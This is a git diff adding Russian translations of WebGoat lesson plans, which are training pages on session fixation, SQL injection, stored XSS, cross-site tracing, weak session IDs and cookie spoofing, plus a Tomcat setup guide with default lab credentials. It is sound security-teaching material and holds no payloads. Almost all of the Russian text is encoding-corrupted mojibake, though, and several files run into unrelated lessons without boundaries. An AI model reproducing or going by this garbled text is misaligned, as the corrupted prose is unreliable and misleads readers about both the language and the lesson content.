+ĐŃ‚Đľ позволяет клиентам проходить поцедŃŃ€Ń Đ°Đ˛Ń‚ĐľŃ€Đ¸Đ·Đ°Ń†Đ¸Đ¸ вŃего 1 раз, Đ° затем Ńже обращатьŃŃŹ Đş
+приложению как авторизированное лицо. Đ’ некоторых приложениях идентификатор ŃеŃŃии
+передаётŃŃŹ в ŃŃылках, в качеŃтве одного из параметров GET-запроŃĐ°. ЗдеŃŃŚ и начинаютŃŃŹ главные проблемы.
+
+ĐŃ‚Đ°ĐşŃющий может поŃлать жертве гипер-ŃŃŃ‹Đ»ĐşŃ ŃодеращŃŃŽ в Ńебе любой
+идентификатор ŃеŃŃии. ĐŃ‚Đľ может быть Ńделано, например, через почтовое
+Ńообщение, которое выглядит как обращение админиŃтрации Ńайта.
+Когда жертва, кликнŃв по ней, попадёт на Ńайт и пройдёт авторизацию, Ń‚Đľ идентификатор ŃеŃŃии, выбранный
+злоŃĐĽŃ‹Ńленником, Ńтанет идентификатором авторизованного пользователя-жертвы.
+ĐŃ‚Đ°ĐşŃющий может пройти по любой ŃŃылке передав ŃĐµŃ€Đ˛ĐµŃ€Ń ŃŤŃ‚ĐľŃ‚ же идентификатор,
+и Ńможет дейŃтвовать от чŃжого имени.
+
ĐžŃновные цели и задачи:
+
+Урок имеет неŃколько Ńтадий. Đ’Ń‹ играете роль и Đ°Ń‚Đ°ĐşŃющего и жертвы.
+Đš ĐşĐľĐ˝Ń†Ń Ńрока вы поймёте что передача идентификаторов ŃеŃŃий в ŃŃылках
+являетŃŃŹ очень плохой практикой.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SilentTransactions.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SilentTransactions.html
new file mode 100644
index 000000000..d1d15675d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SilentTransactions.html
@@ -0,0 +1,27 @@
+
+
Название Ńрока: Đтаки Ńвязанные ŃĐľ Ńкрытыми операциями.
+
Тема для изŃчения:
+На данном Ńроке вы поймёте как ĐľŃŃщеŃтвляютŃŃŹ атаки Ńвязанные ŃĐľ Ńкрытыми операциями.
+
+
+Как работают атаки такого рода:
+
+Некоторые приложения производят манипŃляции Ń Ń‡ŃвŃтвительными пользовательŃкими данными (например Ń Đ´ĐµĐ˝ŃŚĐłĐ°ĐĽĐ¸)
+в Ńкрытом виде еŃли полŃчат разреŃение на ŃŤŃ‚Đľ хотя бы один раз. ĐŃ‚Đľ таит множеŃтво опаŃноŃтей.
+Например, в проŃтом веб-приложении для того чтоб от имени клиента обратитьŃŃŹ Đş Đ»ŃŽĐ±ĐľĐĽŃ URL необходимо
+полŃчить его идентификатор ŃеŃŃии (или Đ´Ń€Ńгие данные, которые обеŃпечат необходимŃŃŽ идентификацию).
+Đ’ ŃĐ»Ńчае Ń AJAX вŃŃ‘ намного проще: обращение Đş ŃĐµŃ€Đ˛ĐµŃ€Ń ĐĽĐľĐ¶ĐµŃ‚ проиŃходить в Ńкрытом режиме без оповещения об этом пользователя.
+Следовательно, внедрённый каким-либо образом в Ń‚Đ°ĐşŃŃŽ ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń Đ˛Ń€ĐµĐ´ĐľĐ˝ĐľŃный Ńкрипт может ĐľŃŃщеŃтвлять важные
+операции ŃоверŃенно незаметно для клиента. Например переводить его деньги ŃĐľ Ńчёта на Ńчёт.
+
ĐžŃновные цели и задачи:
+
+* ĐŃ‚Đľ проŃтейŃее приложение интернет-банкинга - Ńтраница перевода денег.
+
Название Ńрока: ĐžŃŃщеŃтвление SOAP-запроŃов
+
Тема для изŃчения:
+
+Веб-ŃервиŃŃ‹ общаютŃŃŹ ĐĽĐµĐ¶Đ´Ń Ńобой Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ SOAP-запроŃов. Đти запроŃŃ‹ отправляютŃŃŹ
+на веб-ŃĐµŃ€Đ˛Đ¸Ń Đ¸ вызывают выполнение некоторых Ń„Ńнкций опиŃанных в WSDL-файлах.
+Đ Đ°ŃŃмотрим их подробнее. ĐŁ WebGoat еŃŃ‚ŃŚ Ńвой WSDL-файл, над которым
+вы можете поэкŃпериментировать.
+
+ĐžŃновные цели и задачи:
+ПопробŃйте ŃоединитьŃŃŹ Ń WSDL Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ браŃзера или какой-нибŃĐ´ŃŚ Ńтилиты для работы Ń
+веб-ŃервиŃами. URL ŃервиŃĐ° http://localhost/WebGoat/services/SoapRequest . WSDL
+может быть вызван добавлением в конец URL фразы ?WSDL.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html
new file mode 100644
index 000000000..d8a13b346
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html
@@ -0,0 +1,22 @@
+
+
Название Ńрока: Проведение чиŃловых SQL-инъекций
+
Тема для изŃчения:
+
+SQL-инъекции предŃтавляют из Ńебя очень ŃерьёзнŃŃŽ ŃĐłŃ€ĐľĐ·Ń Đ´Đ»ŃŹ Ńайтов ĐľŃнованных на Đ‘Đ”.
+Методы их иŃпользования Đ´ĐľŃтаточно легки в ĐľŃвоении, Đ° Ńщерб Ńоздаваемый ими огромен и
+при определённых ŃŃловиях может произойти Đş компрометации вŃей ŃиŃтемы. Тем не менее,
+количеŃтво интернет-Ńайтов Ń ŃязвимоŃтями данного типа поŃтоянно раŃŃ‚Ń‘Ń‚.
+ĐžŃновные цели:
+Đ Đ°Ńположенная ниже форма позволяет пользователям Ńмотреть данные Đľ погоде.
+Đ’Đ°ĐĽ необходимо Ń ĐµŃ‘ помощью обнарŃжить в теŃтовом приложении ŃязвимоŃŃ‚ŃŚ.
+Для подŃказки чŃŃ‚ŃŚ ниже выводитŃŃŹ итоговый запроŃ, который полŃчаетŃŃŹ на
+Ńтороне Ńервера.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlStringInjection.html
new file mode 100644
index 000000000..4b329edea
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SqlStringInjection.html
@@ -0,0 +1,22 @@
+
+
Название Ńрока: Как иŃпользовать Ńтроковые SQL-инекции
+
Тема для изŃчения:
+
+SQL-инъекции предŃтавляют из Ńебя очень ŃерьёзнŃŃŽ ŃĐłŃ€ĐľĐ·Ń Đ´Đ»ŃŹ Ńайтов ĐľŃнованных на Đ‘Đ”.
+Методы их иŃпользования Đ´ĐľŃтаточно легки в ĐľŃвоении, Đ° Ńщерб Ńоздаваемый ими огромен и
+при определённых ŃŃловиях может произойти Đş компрометации вŃей ŃиŃтемы. Тем не менее,
+количеŃтво интернет-Ńайтов Ń ŃязвимоŃтями данного типа поŃтоянно раŃŃ‚Ń‘Ń‚.
+ĐžŃновные цели и задачи:
+Đ Đ°Ńположенная ниже форма позволяет пользователям проŃматривать их номера кредитных карт.
+ПопробŃйте внеŃти SQL-выражение в поле фамилии. ПоŃле отправки формы вы чŃŃ‚ŃŚ ниже Ńвидите итоговый
+SQL-запроŃ, который ŃформирŃетŃŃŹ в приложении. Đ’ качеŃтве Ńамой фамилии иŃпользŃйте 'Smith'.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/StoredXss.html
new file mode 100644
index 000000000..8d0b9e06e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/StoredXss.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: Проведение хранимых XSS
+
Тема для изŃчения:
+
+ХороŃей практикой вŃегда ŃчиталаŃŃŚ очиŃтка вŃех входящих данных, ĐľŃобенно когда
+их Ńодержимое бŃĐ´ŃŃ‚ иŃпользовано в качеŃтве команд ОС, Ńкриптов или запроŃов Đş
+Đ‘Đ”. ĐŃ‚Đľ важно и для тех данных, которые бŃĐ´ŃŃ‚ Ńохранены где-Ń‚Đľ
+внŃтри приложения. ПоŃетители не должны иметь возможноŃŃ‚ŃŚ ĐżŃбликации на Ńайте
+таких Ńообщений, которые могŃŃ‚ изменять ŃŃ‚Ń€ŃктŃŃ€Ń Ńтраницы при их проŃмотре.
+
+ĐžŃновные цели и задачи:
+Đ’Ń‹ должны добавить такое Ńообщение, которое при проŃмотре Đ´Ń€Ńгим пользователем бŃдет формировать
+на данной Ńтранице поддельное Ńодержимое.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html
new file mode 100644
index 000000000..c10a9b044
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html
@@ -0,0 +1,35 @@
+
+
+
+
+ План Ńрока
+
+
+
+
+
Название Ńрока: Как ŃŤĐşŃплŃатировать проблемы одновременной работы неŃкольких потоков.
+
Тема для изŃчения:
+
+Веб-приложения могŃŃ‚ обрабатывать множеŃтво HTTP-запроŃов одновременно.
+ЧаŃŃ‚Đľ разработчики иŃпользŃŃŽŃ‚ конŃŃ‚Ń€Ńкции не приŃпоŃобленные Đş многопоточной работе, и
+ŃŤŃ‚Đľ Ńоздаёт возможноŃŃ‚ŃŚ иŃпользования ĐľŃибок Ńвязанных Ń ĐľĐ´Đ˝ĐľĐ˛Ń€ĐµĐĽĐµĐ˝Đ˝Ń‹ĐĽĐ¸ обращениями.
+Например когда одна и Ń‚Đ° же Ńтраница открываетŃŃŹ одновременно разными пользователями и один их них видит
+на ней данные Đ´Ń€Ńгого.
+Под приŃпоŃобленноŃŃ‚ŃŚŃŽ Đş многопоточной работе подразŃмеваетŃŃŹ ŃпоŃобноŃŃ‚ŃŚ полей клаŃŃов и объектов
+вŃегда находитьŃŃŹ в верном ŃĐľŃтоянии при выполнении множеŃтва одних и тех же операций вызываемых
+разными потоками. ПоŃĐşĐľĐ»ŃŚĐşŃ Đ˛Ńе потоки иŃпользŃŃŽŃ‚ одно и Ń‚Đľ же рабочее проŃтранŃтво вызываемых методов, и в данном
+проŃтранŃтве хранятŃŃŹ данные вŃех ŃвойŃтв отдельно взятых клаŃŃов, Ń‚Đľ множеŃтвенные одновременные попытки
+обращений Đş ним могŃŃ‚ привеŃти Đş неожиданным резŃльтатам.
+ĐžŃновные цели:
+Đ’ приложении Ńрока пользователь может воŃпользоватьŃŃŹ ŃязвимоŃŃ‚ŃŽ данного типа для того чтобы проŃматривать
+авторизационные данные Đ´Ń€Ńгого пользователя, еŃли одновременно Ń Đ˝Đ¸ĐĽ попытаетŃŃŹ вызвать однŃ
+и Ń‚Ń Đ¶Đµ Ń„Ńнкцию.
+ЗдеŃŃŚ вам придётŃŃŹ иŃпользовать два браŃзера .
+НаŃтройка Tomcat Введение
+WebGoat раŃпроŃтраняетŃŃŹ Ń ĐşĐľĐ˝Ń„Đ¸ĐłŃрацией Tomcat по Ńмолчанию. На данной Ńтранице вы найдёте её короткое опиŃание и
+ŃпиŃок возможных вариантов различных наŃтроек. Đ’ ŃĐ»Ńчаях когда данное опиŃание вам не помогает обращайтеŃŃŚ Đş официальной
+докŃментации Tomcat.
+Кроме того, Đ˝Ńжно Ńказать что вŃŃ‘ нижеопиŃанное отноŃитŃŃŹ Đş Ńтандартной конфигŃрации Ńервера работающего на 80-ом портŃ.
+Đ•Ńли вы иŃпользŃете для Ńервера Đ´Ń€Ńгой порт, Ń‚Đľ вам необходимо бŃдет изменить конфигŃрацию ŃоответŃтвŃющим образом.
+
+
+Стандартная конфигŃрация
+ЗдеŃŃŚ имеетŃŃŹ две Ńтандартных конфигŃрации Tomcat. При их иŃпользовании Đ´ĐľŃŃ‚ŃĐż Đş ŃĐµŃ€Đ˛ĐµŃ€Ń ĐĽĐľĐ¶Đ˝Đľ полŃчить обращаяŃŃŚ Đş Ń…ĐľŃŃ‚Ń localhost.
+Они полноŃŃ‚ŃŚŃŽ идентичны, Đ·Đ° иŃключением того что в первом ŃĐ»Ńчае ŃервиŃŃ‹ Tomcat Đ·Đ°ĐżŃŃкаютŃŃŹ на портах 80 и 443 (SSL), Đ° во втором -
+на портах 8080 и 8443. Đ’ Linux вы должны Đ·Đ°ĐżŃŃтить WebGoat как root или Ń Đ¸Ńпользованием sudo еŃли хотите чтоб он работал на портах
+80 и 443.
+Помните, что Đ·Đ°ĐżŃŃĐş ПО из под root`Đ° очень опаŃное занятие, ĐżĐľŃŤŃ‚ĐľĐĽŃ ĐĽŃ‹ наŃтоятельно рекомендŃем иŃпользовать порты 8080 и 8443.
+Đ’ Windows вы можете Đ·Đ°ĐżŃŃтить WebGoat.bat для работы на 80-ом портŃ, или же WebGoat_8080.bat для работы на ĐżĐľŃ€Ń‚Ń 8080.
+Đ’ Linux Ń‚Ń Đ¶Đµ ŃĐ°ĐĽŃŃŽ Ń€Đ°Đ±ĐľŃ‚Ń Đ˛Ń‹ĐżĐľĐ»Đ˝ŃŹĐµŃ‚ Ńкрипт WebGoat.sh и для того же резŃльтата его необходимо Đ·Đ°ĐżŃŃтить либо командой
+"webgoat.sh start80", либо "webgoat.sh start8080". Пользователь, для Đ´ĐľŃŃ‚Ńпа Đş приложению,
+в Ńтандартной конфигŃрации - guest Ń ĐżĐ°Ń€ĐľĐ»ĐµĐĽ guest.
+
+
+НаŃтройка Ńервера
+
+Đ•Ńли вы единŃтвенный кто бŃдет иŃпользовать WebGoat, Ń‚Đľ Ńтандартной конфигŃрации вам
+бŃдет вполне Đ´ĐľŃтаточно. Đ•Ńли же вы бŃдете Đ·Đ°ĐżŃŃкать его в лаборатории или клаŃŃе, Ń‚Đľ конфигŃрацию
+Đ˝Ńжно бŃдет менять. Перед этим ŃоветŃем вам Ńделать её резервнŃŃŽ копию.
+
+
+Đзменение портов
+
+ Для изменения портов откройте файл server_80.xml, котрый можно найти в tomcat/conf, и измените
+ не-SSL порт. Например, еŃли вы хотите иŃпользовать порт 8079:
+
+
+
+ <!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
+ <Connector address="127.0.0.1" port="8079"...
+
+
+Конечно же вы можете изменить и порт SSL-Ńоединения. Вот пример переноŃĐ° SSL на порт 8442:
+
+
+ <!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
+ <Connector address="127.0.0.1" port="8442"...
+
+Делаем WebGoat Đ´ĐľŃŃ‚Ńпным для неŃкольких клиентов.
+ĐТО ОТКРЫВĐЕТ Đ’ĐШ СЕРВЕРДЛЯ Đ Đ•ĐЛЬНЫХ ĐТĐĐš ĐĐ— ВНЕ! НЕ ДЕЛĐЙТЕ ĐТОГО ЕСЛРВЫ НР100%
+ НЕ УВЕРЕНЫ Đ’ НЕОБХОДĐМОСТРДĐННОГО ШĐĐ“Đ. ĐТРКОНФĐĐ“ĐŁĐ ĐЦĐĐŻ МОЖЕТ БЫТЬ ĐСПОЛЬЗОВĐНРТОЛЬКО
+ В ДОВЕРЕННЫХ СЕТЯХ.
+
+По Ńмолчанию WebGoat Đ´ĐľŃŃ‚Ńпен только при обращении Đş Ń…ĐľŃŃ‚Ń localhost. Đ’ лаборатории или клаŃŃе
+Ń Đ˛Đ°Ń ĐĽĐľĐ¶ĐµŃ‚ возникнŃŃ‚ŃŚ необходимоŃŃ‚ŃŚ организовать Ńервер Ń ĐĽĐ˝ĐľĐ¶ĐµŃтвом клиентов. Đ’ данном ŃĐ»Ńчае
+вы можете наŃтроить WebGoat ŃоответŃтвŃющим образом.
+
+Причина того что WebGoat Đ´ĐľŃŃ‚Ńпен только на localhost - параметр address тега Connector в файле server_80.xml.
+ Đзначально его значение ŃŃтановлено в 127.0.0.1 . При Đ·Đ°ĐżŃŃке приложение начинает проверять пропиŃанные в наŃтройках порты
+ только на этом адреŃе и принимает Ńоединения еŃли они появляютŃŃŹ. Đ•Ńли вы Ńдалите данный параметр, Ń‚Đľ приложение
+ начнёт проŃĐ»ŃŃивать ŃоответŃтвŃющие порты на вŃех Đ´ĐľŃŃ‚Ńпных IP-адреŃĐ°Ń….
+
+
+РазреŃение Ńоединений только от определённых клиентов
+
+Đ’Ń‹Ńе опиŃывалŃŃŹ ŃпоŃоб разреŃения Ńоединений Ń WebGoat для любых клиентов.
+Đ•Ńли вы хотите разреŃить Đ´ĐľŃŃ‚ŃĐż Đş приложению только Ń ĐľĐżŃ€ĐµĐ´ĐµĐ»Ń‘Đ˝Đ˝Ń‹Ń… адреŃов, воŃпользŃйтеŃŃŚ
+фильтром Ńдалённых адреŃов (Remote Address Filter). Для этого добавьте ŃледŃющюю ŃтрокŃ
+в файл web_80.xml:
+
+
+ <Valve className="org.apache.catalina.valves.RemoteAddrValve"
+ allow="127.0.0.1,ip1,ip2"/>
+
+Đ’ этом ŃĐ»Ńчае только localhost, ip1 и ip2 ŃмогŃŃ‚ ŃŃтанавливать Ńоединения Ń Ńервером.
+
+Стандартные пользователи WebGoat и роли для Tomcat
+
+WebGoat`Ń Đ´Đ»ŃŹ нормальной работы необходимо наличие ŃледŃющих пользователей и ролей:
+
+ >role rolename="webgoat_basic"/<
+ >role rolename="webgoat_admin"/<
+ >role rolename="webgoat_user"/<
+ >user username="webgoat" password="webgoat" roles="webgoat_admin"/<
+ >user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/<
+ >user username="guest" password="guest" roles="webgoat_user"/<
+
+
+Добавление пользователей
+
+Обычно для нормальной работы Ń WebGoat вам Đ´ĐľŃтаточно бŃдет пользователя guest Ń ĐżĐ°Ń€ĐľĐ»ĐµĐĽ guest.
+Но когда вы развернёте его в лоборатории или клаŃŃе может возникнŃŃ‚ŃŚ необходимоŃŃ‚ŃŚ Ńоздания отдельного
+пользователя для каждого клиента. Для этого вам необходимо изменить файл tomcat-users.xml, которых находитŃŃŹ в tomcat/conf.
+Мы наŃтоятельно не рекомендŃем хранить реальные дейŃтвŃющие пароли в данном файле Ń‚.Đş.
+Ń‚Đ°ĐĽ они пропиŃываютŃŃŹ в виде проŃтого текŃŃ‚Đ°!
+
+Добавление пользователя
+
+ ПроцедŃра добавления пользователя очень проŃŃ‚Đ°. Đ’ качеŃтве наглядного примера вы можете иŃпользовать
+ ŃŃ‚Ń€ĐľĐşŃ Ń ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ĐµĐĽ guest. Помните что каждый вновь добавляемый пользователь должен иметь определённŃŃŽ роль.
+ Для добавления новых аккаŃнтов впиŃите в выŃеŃказанный файл Ńтроки типа этих:
+
+
+ <user name="student1" password="password1" roles="webgoat_user"/>
+ <user name="student2" password="password2" roles="webgoat_user"/>
+ ...
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/TraceXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/TraceXSS.html
new file mode 100644
index 000000000..08168f249
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/TraceXSS.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: Проведение XST-Đ°Ń‚Đ°Đş (Cross Site Tracing/Trace-XSS)
+
Тема для изŃчения:
+
+ХороŃей практикой вŃегда ŃчиталаŃŃŚ очиŃтка вŃех входящих данных, ĐľŃобенно когда
+их Ńодержимое бŃĐ´ŃŃ‚ иŃпользовано в качеŃтве команд ОС, Ńкриптов или запроŃов Đş
+Đ‘Đ”. ĐŃ‚Đľ важно и для тех данных, которые бŃĐ´ŃŃ‚ Ńохранены где-Ń‚Đľ
+внŃтри приложения. ПоŃетители не должны иметь возможноŃŃ‚ŃŚ ĐżŃбликации на Ńайте
+таких Ńообщений, которые могŃŃ‚ изменять ŃŃ‚Ń€ŃктŃŃ€Ń Ńтраницы при их проŃмотре.
+ĐžŃновные цели:
+Tomcat наŃтроен на ĐżĐľĐ´Đ´ĐµŃ€Đ¶ĐşŃ ĐşĐľĐĽĐ°Đ˝Đ´Ń‹ HTTP TRACE. Đ’Đ°ŃĐ° цель Ń ĐµŃ‘ помощью ĐľŃŃщеŃтвить
+XST-нападение.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/UncheckedEmail.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/UncheckedEmail.html
new file mode 100644
index 000000000..0b70a3f27
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/UncheckedEmail.html
@@ -0,0 +1,12 @@
+
+
Название Ńрока: ĐŃпользование непроверяемых почтовых Ńообщений
+
Тема для изŃчения:
+
+Многие Ńайты позволяют не Đ°Ńтентифицированным пользователям отправлять почтовые
+Ńообщения Ńвоим "Đ´Ń€ŃĐ·ŃŚŃŹĐĽ". Такие Ńайты предŃтавляют из Ńебя хороŃий инŃŃ‚Ń€Ńмент
+для Ńпамеров, которые полŃчают возможноŃŃ‚ŃŚ Ńлать Ń€ĐµĐşĐ»Đ°ĐĽŃ Ń Đ¸Ńпользованием
+почтового Ńервера компании.
+
+ĐžŃновные цели и задачи:
+Пользователь должен отоŃлать любое почтовое Ńообщение.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/UsefulTools.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/UsefulTools.html
new file mode 100644
index 000000000..74bfe257d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/UsefulTools.html
@@ -0,0 +1,46 @@
+
+
+ĐŃпользŃемые инŃŃ‚Ń€Ńменты
+
+Ниже находитŃŃŹ ŃпиŃок инŃŃ‚Ń€Ńментов, которые, по наŃĐµĐĽŃ ĐĽĐ˝ĐµĐ˝Đ¸ŃŽ, могŃŃ‚ вам пригодитьŃŃŹ при прохождении Ńроков WebGoat.
+Для выполнения больŃинŃтва заданий вам понадобитŃŃŹ WebScarab или Paros.
+WebScarab:
+
+Как и WebGoat, WebScarab - ŃŤŃ‚Đľ чаŃŃ‚ŃŚ OWASP. Он предŃтавляет из Ńебя прокŃи-Ńервер
+для иŃŃледования приложений иŃпользŃющих протоколы HTTP и HTTPS. Так как WebScarab
+являетŃŃŹ перехватывающим прокŃи-Ńервером, Ń‚Đľ ĐĽŃ‹ Ń ĐµĐłĐľ помощью можем проŃматривать и изменять
+Ńодержимое запроŃов и ответов на них.
+http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
+
+Firebug:
+
+Firebug - ŃŤŃ‚Đľ дополнение Đş браŃĐ·ĐµŃ€Ń Firefox. Мы можем иŃпользовать его для проверки, редактирования и мониторинга CSS, HTML и JavaScript.http://www.getfirebug.com
+
IEWatch:
+
+IEWatch - ŃŤŃ‚Đľ Ńтилита для анализа HTTP и HTML для пользователей Internet Explorer.http://www.iewatch.com
+
+Wireshark
+
+Wireshark - ŃŤŃ‚Đľ анализатор Ńетевого трафика. С его помощью вы можете отлавливать Ńетевой трафик и полŃчать из него интереŃĐ˝ŃŃŽ информацию.http://www.wireshark.org
+
+
+
+Сканнер:
+
+Đ’ данный момент имеетŃŃŹ больŃое количеŃтво Ńканеров для веб-приложений. Они могŃŃ‚ находить XSS, инъективные и Đ´Ń€Ńгие ŃязвимоŃти.
+Ниже предŃтавлены ŃŃылки на два Ńканера Ń ĐľŃ‚ĐşŃ€Ń‹Ń‚Ń‹ĐĽ иŃходным кодом.
+http://www.nessus.org http://www.parosproxy.org
+
+
+
Название Ńрока: ĐžŃŃщеŃтвление WSDL-Ńканиорвания
+
Тема для изŃчения:
+
+
+Веб-ŃервиŃŃ‹ общаютŃŃŹ ĐĽĐµĐ¶Đ´Ń Ńобой Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ SOAP-запроŃов. Đти запроŃŃ‹ отправляютŃŃŹ
+на веб-ŃĐµŃ€Đ˛Đ¸Ń Đ¸ вызывают выполнение некоторых Ń„Ńнкций опиŃанных в WSDL-файлах.
+ĐžŃновные цели и задачи:
+Ниже раŃположена форма которая работает Ń Ńже извеŃтным вам веб-ŃервиŃом
+через его API. Внимательно изŃчите WSDL-файл и попробŃйте отправить Ń„ĐľŃ€ĐĽŃ Ń‚Đ°Đş,
+чтоб ŃĐµŃ€Đ˛Đ¸Ń Đ˛ĐµŃ€Đ˝ŃĐ» вам номера кредитных карт неŃкольких заказчиков.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..fb97ecbed
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html
@@ -0,0 +1,19 @@
+
+
Название Ńрока: How to Spoof an Authentication Cookie
+
Тема для изŃчения:
+Многие Ńайты автоматичеŃки Đ°ŃтентифицирŃŃŽŃ‚ пользователя еŃли он имеет ĐľŃобые cookies.
+Đногда Ńодержимое таких cookies может быть Ńгадано еŃли злоŃĐĽŃ‹Ńленник вычиŃлил алгоритм их генерации.
+Đ’ Đ´Ń€Ńгих ŃĐ»Ńчаях cookies могŃŃ‚ быть перехвачены, Ńкрадены через ŃязвимоŃти в приложении (например через XSS)
+или ŃиŃтеме пользователя. На этом Ńроке вы ознакомитеŃŃŚ Ń Đ¸Ńпользованием таких cookies и
+попытаетеŃŃŚ обойти ŃиŃŃ‚ĐµĐĽŃ Đ°Ńтентификации ĐľŃнованнŃŃŽ на них.
+ĐžŃновные цели и задачи:
+
+Пользователь должен обойти механизм проверки Đ°Ńтентификации.
+Войдите под аккаŃнтом webgoat/webgoat и поŃмотрите что полŃчитŃŃŹ.
+Вы также можете попробовать данные aspect/aspect. Как только вы поймёте
+как можно Đ°ŃтентифицироватьŃŃŹ под Đ´Ń€Ńгими именами, попробŃйте войти под
+логином alice.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakSessionID.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakSessionID.html
new file mode 100644
index 000000000..0711706f6
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WeakSessionID.html
@@ -0,0 +1,12 @@
+
+
Название Ńрока: Похищение ŃеŃŃии
+
Тема для изŃчения:
+
+Разработчики приложений, Ńоздающие Ńвои механизмы работы Ń ŃеŃŃиями, иногда
+забывают Đľ том что идентификаторы ŃеŃŃий должны генерироватьŃŃŹ ŃĐ»Ńчайным образом
+и иметь Đ´ĐľŃтаточнŃŃŽ длиннŃ. Đначе они могŃŃ‚ быть банально подобраны злоŃĐĽŃ‹Ńленником
+методом грŃбой Ńилы (brute force).
+ĐžŃновные цели:
+ПопробŃйте подобрать идентификатор рабочей ŃеŃŃии принадлежащей Đ´Ń€ŃĐłĐľĐĽŃ ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŽ.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html
new file mode 100644
index 000000000..be93e40e2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html
@@ -0,0 +1,16 @@
+
+
Lesson Plan Title:Welcome
+
Concept / Topic To Teach:
+This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/WsSAXInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WsSAXInjection.html
new file mode 100644
index 000000000..cd1dc0bd1
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/WsSAXInjection.html
@@ -0,0 +1,15 @@
+
+
Название Ńрока: Работа Ń SAX-инъекциями в веб-ŃервиŃĐ°Ń…
+
Тема для изŃчения:
+
+Веб-ŃервиŃŃ‹ общаютŃŃŹ ĐĽĐµĐ¶Đ´Ń Ńобой Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ SOAP-запроŃов. Đти запроŃŃ‹ отправляютŃŃŹ
+на веб-ŃĐµŃ€Đ˛Đ¸Ń Đ¸ вызывают выполнение некоторых Ń„Ńнкций опиŃанных в WSDL-файлах.
+ĐžŃновные цели и задачи:
+Некоторые веб-интерфейŃŃ‹ могŃŃ‚ иŃпользовать веб-ŃервиŃŃ‹ в невидимом для пользователя режиме.
+Đ•Ńли веб-ŃĐµŃ€Đ˛Đ¸Ń Đ˝Đ¸ĐşĐ°Đş не проверяет целоŃтноŃŃ‚ŃŚ входных данных (или проверяет недоŃтаточно),
+пользователь может подделать XML отŃылаемый веб-интерфейŃом и выдать его Đ·Đ° наŃтоящий.
+
+
Название Ńрока: ĐŃпользование SQL-инъекций в веб-ŃервиŃĐ°Ń….
+
Тема для изŃчения:
+
+Веб-ŃервиŃŃ‹ общаютŃŃŹ ĐĽĐµĐ¶Đ´Ń Ńобой Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ SOAP-запроŃов. Đти запроŃŃ‹ отправляютŃŃŹ
+на веб-ŃĐµŃ€Đ˛Đ¸Ń Đ¸ вызывают выполнение некоторых Ń„Ńнкций опиŃанных в WSDL-файлах.
+ĐžŃновные цели и задачи:
